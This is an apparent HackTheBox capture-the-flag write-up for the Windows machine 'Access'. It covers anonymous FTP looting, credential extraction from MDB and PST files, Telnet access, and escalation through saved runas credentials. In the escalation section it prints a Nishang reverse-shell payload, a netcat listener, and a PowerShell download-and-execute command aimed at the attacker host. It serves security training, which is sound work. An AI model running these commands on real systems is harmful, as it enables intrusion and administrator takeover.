HackTheBox Easy 🪟 Windows

Access

📅 Jan 12, 2025 ⏱️ 20 min read 🏷️ FTP, Database, Telnet, PrivEsc, SavedCreds

// Table of Contents

Summary
Reconnaissance
FTP Enumeration
Database Analysis
Archive & Email Analysis
Initial Foothold
Privilege Escalation
Key Takeaways

Summary

Access is an "easy" Windows machine that demonstrates how machines associated with physical security systems may not themselves be secure. We exploit anonymous FTP access to obtain a database file containing credentials, use those credentials to extract an email archive with more credentials, and finally exploit saved Windows credentials for privilege escalation.

💡 Box Info

IP: 10.10.10.98
OS: Windows Server 2008 R2
Difficulty: Easy
Key Skills: FTP Enumeration, MDB Analysis, Saved Credentials

Reconnaissance

Starting with an Nmap scan to identify open ports and services:

bash

nmap -sC -sV -oA nmap/access 10.10.10.98

nmap output

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
23/tcp open  telnet  Microsoft Windows XP telnetd
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: MegaCorp
Service Info: OS: Windows

📊 Port Analysis

Port 21 (FTP): Anonymous login allowed - Primary attack vector
Port 23 (Telnet): Potential access point once we get credentials
Port 80 (HTTP): IIS 7.5 serving MegaCorp website

FTP Enumeration

Anonymous FTP access is our primary attack vector. Let's connect and explore:

bash

ftp 10.10.10.98
Name: anonymous
Password: [blank]
230 User logged in.

ftp> ls
08-23-18  09:16PM       <DIR>          Backups
08-24-18  10:00PM       <DIR>          Engineer

Downloading Files

Let's grab everything from both directories:

bash

ftp> cd Backups
ftp> get backup.mdb
5652480 bytes received

ftp> cd ../Engineer
ftp> get "Access Control.zip"
10870 bytes received

✅ Files Retrieved

backup.mdb: 5.6MB Microsoft Access database
Access Control.zip: Password-protected archive

Database Analysis

The backup.mdb file is a Microsoft Access database. Let's analyze it using mdb-tools:

bash

sudo apt install mdb-tools
mdb-tables backup.mdb | tr ' ' '\n' | grep -i user
# Found: auth_user

mdb-export backup.mdb auth_user

output

id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,

🔑 Credentials Found!

engineer: access4u@security
This password might work for the ZIP file!

Archive & Email Analysis

Let's try the engineer's password on the ZIP file:

bash

unzip "Access Control.zip"
# Password: access4u@security
# Extracted: Access Control.pst

PST File Analysis

The extracted file is an Outlook PST archive. Let's convert and read it:

bash

sudo apt install pst-utils
readpst "Access Control.pst"
cat "Access Control.mbox"

email content

From: [email protected]
To: [email protected]
Subject: Credentials Update

The password for the "security" account has been 
changed to 4Cc3ssC0ntr0ller.
Please ensure this is passed on to your engineers.

🎯 Critical Credentials!

Username: security
Password: 4Cc3ssC0ntr0ller

Initial Foothold

Now we can use the discovered credentials to access the Telnet service:

bash

telnet 10.10.10.98
login: security
password: 4Cc3ssC0ntr0ller

C:\Users\security>

User Flag

cmd

C:\Users\security\Desktop>type user.txt
85d48b885cf14ed396b85608b3278068

Privilege Escalation

Let's enumerate for privilege escalation vectors. Checking the Public desktop:

cmd

C:\Users\security>cd C:\Users\Public\Desktop
C:\Users\Public\Desktop>dir
08/22/2018  10:18 PM   1,870 ZKAccess3.5 Security System.lnk

C:\Users\Public\Desktop>type "ZKAccess3.5 Security System.lnk"

🚨 Critical Discovery - Saved Credentials!

The shortcut contains:

runas.exe /user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"

The /savecred parameter means Administrator credentials are saved and can be reused!

Exploitation

Set up a reverse shell using Nishang:

bash (attacker)

# Clone Nishang and prepare payload
git clone https://github.com/samratashok/nishang.git
cp nishang/Shells/Invoke-PowerShellTcp.ps1 shell.ps1
echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.10 -Port 443' >> shell.ps1

# Start web server
python3 -m http.server 80

# Start listener
nc -lvnp 443

Execute the payload using saved credentials:

cmd (target)

runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.10/shell.ps1')"

Administrator Shell

powershell

PS C:\Windows\system32> whoami
access\administrator

PS C:\Users\Administrator\Desktop> type root.txt
6e1586cc7ab230a8d297e8f933d904cf

🏆 Root Flag Captured!

Root Flag: 6e1586cc7ab230a8d297e8f933d904cf

🎯 Key Takeaways

Anonymous FTP: Always check for anonymous access on file sharing services
Database Files: MDB files often contain plaintext credentials - use mdb-tools
Email Archives: PST files frequently contain sensitive information
Credential Reuse: Always test found passwords across different services
Saved Credentials: The /savecred parameter in Windows is a significant security risk
Legacy Services: Telnet transmits in plaintext - easy targets

Tools Used

nmap - Port scanning and service enumeration
ftp - Anonymous file transfer
mdb-tools - Microsoft Access database analysis
readpst - Outlook PST file conversion
telnet - Remote access
nishang - PowerShell reverse shell
netcat - Reverse shell listener